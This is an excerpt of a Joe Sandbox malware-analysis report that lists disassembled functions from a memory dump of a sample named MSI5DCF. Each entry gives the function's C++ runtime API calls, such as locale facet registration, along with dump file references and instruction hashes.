                                                                        Function 00AE81EF Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE81F6
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE8200
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE8251
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE8271
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: d277e94177c33c6d4b787dd5b3df41d02466fe9a687bb8b5efa41f79a20293a8
                                                                        • Instruction ID: f468dbe1bcc063f6b0a4ca7d19c1f7d8e74adbf8d5ce257a11fd53ab65a3769d
                                                                        • Opcode Fuzzy Hash: d277e94177c33c6d4b787dd5b3df41d02466fe9a687bb8b5efa41f79a20293a8
                                                                        • Instruction Fuzzy Hash: C9012E36C00A59CBCB00EBA4DA056FEB7B1BF80310F24000AF9216B391CF38AE01CB90
                                                                        Function 00AE815A Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE8161
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE816B
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE81BC
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE81DC
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 184858115268085a9c33c3dece897bb34ab5a072262e0dc473f84c4625d43c88
                                                                        • Instruction ID: b781f0d5b44841efeeb02f16949d0d8002e463cda232b665dbaecbcf736afbec
                                                                        • Opcode Fuzzy Hash: 184858115268085a9c33c3dece897bb34ab5a072262e0dc473f84c4625d43c88
                                                                        • Instruction Fuzzy Hash: 9F01F535D10659DBCB00EBA4D9456BE77B1AF84320F25060AF8156B3D1CF38AE02CB90
                                                                        Function 00AE26F9 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE2700
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE270A
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE275B
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE277B
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: c4a311fdac685bcff1a9e03c5c1a671278bf7d2249cc22ac2bf38b79129ce7ca
                                                                        • Instruction ID: 0723c6688de1265f40cd7b66e4c0184f55c163de8e00276d0e4ac7666ccc1ff3
                                                                        • Opcode Fuzzy Hash: c4a311fdac685bcff1a9e03c5c1a671278bf7d2249cc22ac2bf38b79129ce7ca
                                                                        • Instruction Fuzzy Hash: EA01D235D00259DBCB04EBB5DA557BE7BB5AF84310F640109F9216B391CF34AE018B90
                                                                        Function 00AE278E Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE2795
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE279F
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE27F0
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE2810
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 7ae5b721e38714f56a1a3f5ee6bfd6e7ddcd43027340765d214d5d6629d7dc5e
                                                                        • Instruction ID: b06fcff509ce23d6518e243cdcd04566ad897fa428f0709a5358cbc0bf50b4e4
                                                                        • Opcode Fuzzy Hash: 7ae5b721e38714f56a1a3f5ee6bfd6e7ddcd43027340765d214d5d6629d7dc5e
                                                                        • Instruction Fuzzy Hash: 1001D235D102599BCB04EBA4E915BBE7BB5BF80310F250509F4116B392DF34AE01CB90
                                                                        Function 00AF39EB Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF39F2
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF39FC
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF3A4D
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF3A6D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 5256cc3feb65fc91ad0d5b4945bcfbd74e4a79e2533cb96d1a3d6120d4b177aa
                                                                        • Instruction ID: 32a46f35811a8632b5ebbbeb1aa14dadd197b20eaea99a980952db0de0c62ca8
                                                                        • Opcode Fuzzy Hash: 5256cc3feb65fc91ad0d5b4945bcfbd74e4a79e2533cb96d1a3d6120d4b177aa
                                                                        • Instruction Fuzzy Hash: C101CC329002199BCF00FBA5DA456BEBBB1AF84350F25410AF9116B391DF35AF018B90
                                                                        Function 00AE79C9 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE79D0
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE79DA
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7A2B
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7A4B
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 8669b98ce730aca87eb02b633e373d85960ca50500d3b36a4490435ea04d3ba9
                                                                        • Instruction ID: 07f7ead2315b75c6bf9c953c6802117f9b89c9d462a28b7a58a09455a523f04e
                                                                        • Opcode Fuzzy Hash: 8669b98ce730aca87eb02b633e373d85960ca50500d3b36a4490435ea04d3ba9
                                                                        • Instruction Fuzzy Hash: 9701F536D44299DFCB01EBA4E9456BE7BB1AF80310F250509F5216B391DF34AE01CB90
                                                                        Function 00AF3A80 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF3A87
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF3A91
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF3AE2
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF3B02
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: d12e15a5d653a9048aea1f6481b8b1aac903ceebc2f05d6ce476e9a3c8aba4c4
                                                                        • Instruction ID: 919040dd366bea7293256010a74d39b46d8c4127f2147195065edfef494ece1b
                                                                        • Opcode Fuzzy Hash: d12e15a5d653a9048aea1f6481b8b1aac903ceebc2f05d6ce476e9a3c8aba4c4
                                                                        • Instruction Fuzzy Hash: EC01C03690021D9BCF01FBB4D9466BEBBB1AF84350F240509F521AB391DF74AE01CB90
                                                                        Function 00AE7AF3 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7AFA
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7B04
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7B55
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7B75
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 61baed6ada8d210ffb33378090dee187cf3c623d04e3b519b27e7ac31237c582
                                                                        • Instruction ID: ef8348bab7eea304885d898270b4364934dd4192263487925a70238d47088cd7
                                                                        • Opcode Fuzzy Hash: 61baed6ada8d210ffb33378090dee187cf3c623d04e3b519b27e7ac31237c582
                                                                        • Instruction Fuzzy Hash: 8001D232D002599BCB00EFA4D945ABE77B1AF80310F654609F512AB391CF74AE01CB90
                                                                        Function 00AE7A5E Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7A65
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7A6F
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7AC0
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7AE0
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 26b0f842ab05a9befc7ca2438ab60f6272bee9265040146d74f9d90e02083a22
                                                                        • Instruction ID: 02560173fd240b9697b5f54ee4a0e6478c2b1150befdc7dd5f932063af6c885f
                                                                        • Opcode Fuzzy Hash: 26b0f842ab05a9befc7ca2438ab60f6272bee9265040146d74f9d90e02083a22
                                                                        • Instruction Fuzzy Hash: D301DE32D002599BCB00EBA4DA45ABE7BB1AF84320F25010AF5116B392DF38AE01CBD0
                                                                        Function 00AE7B88 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7B8F
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7B99
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7BEA
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7C0A
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 52c3a860b71aded0221ecfc07e309852720a4e6608727547879e64641311cd72
                                                                        • Instruction ID: f7259148e0cdd39e186fa5ed898a2ec5b520439224da28f697c00fa1b91c78cd
                                                                        • Opcode Fuzzy Hash: 52c3a860b71aded0221ecfc07e309852720a4e6608727547879e64641311cd72
                                                                        • Instruction Fuzzy Hash: E401D2329002598BCF05EBA4DA066BE77B5AF80320F24450AF4116B392DF34AE41CB90
                                                                        Function 00AF3CD4 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF3CDB
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF3CE5
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF3D36
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF3D56
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 7d2c9a0c2dd93d3755a7186473b14707eb7b76132c2135b92c0363d7a9810fdb
                                                                        • Instruction ID: 968190fbe22dea53c880375c3a86116ce5038650ca7b7d2a6f60e2fbbf3756ef
                                                                        • Opcode Fuzzy Hash: 7d2c9a0c2dd93d3755a7186473b14707eb7b76132c2135b92c0363d7a9810fdb
                                                                        • Instruction Fuzzy Hash: 6001C0329102199FCF04EBA4E9456BE77A1AF84310F640509F6126B391DF34AE01CB90
                                                                        Function 00AF3C3F Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF3C46
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF3C50
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF3CA1
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF3CC1
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: b9818578b0a72d373c6765157071d4c7f3105b05c4c5a9d985c506f27487206b
                                                                        • Instruction ID: 9047221a0f3888f016de37785da66f1f9a8f6bdb834d0653a0fdc7c9890211bb
                                                                        • Opcode Fuzzy Hash: b9818578b0a72d373c6765157071d4c7f3105b05c4c5a9d985c506f27487206b
                                                                        • Instruction Fuzzy Hash: 2C01C03691061D9BCF00EBE4DA056BEB7A1AF84710F244509F9116B391DF74AE068B90
                                                                        Function 00AE7E71 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7E78
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7E82
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7ED3
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7EF3
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: bdab8e17f4b3aac31ab0eb6451290f681c1d2622a94db1910b81140bae2e04a8
                                                                        • Instruction ID: 59730044c4dd295bcc4a4b078e137a99b741d269652dd6cd34161d68c9155975
                                                                        • Opcode Fuzzy Hash: bdab8e17f4b3aac31ab0eb6451290f681c1d2622a94db1910b81140bae2e04a8
                                                                        • Instruction Fuzzy Hash: 1A01F535D00259DFCF05EBA4EA456BE77B1AF84310F240549F5116B392DF34AE01CB90
                                                                        Function 00AE7F9B Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7FA2
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7FAC
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7FFD
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE801D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 83245d41665443fb0a2613284b70f1efb2b95c5af7584e7c072b5a83f743ef5a
                                                                        • Instruction ID: 9386c8ecc4d4526b05bc9d3d774857d5ef06ada3fbc930a9e52176efd28042ba
                                                                        • Opcode Fuzzy Hash: 83245d41665443fb0a2613284b70f1efb2b95c5af7584e7c072b5a83f743ef5a
                                                                        • Instruction Fuzzy Hash: A501F535D40259DBCB00EFA4DA456BE77B1AF84320F250109F5116B3D2DF34AE01CB91
                                                                        Function 00AE7F06 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AE7F0D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE7F17
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE7F68
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7F88
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
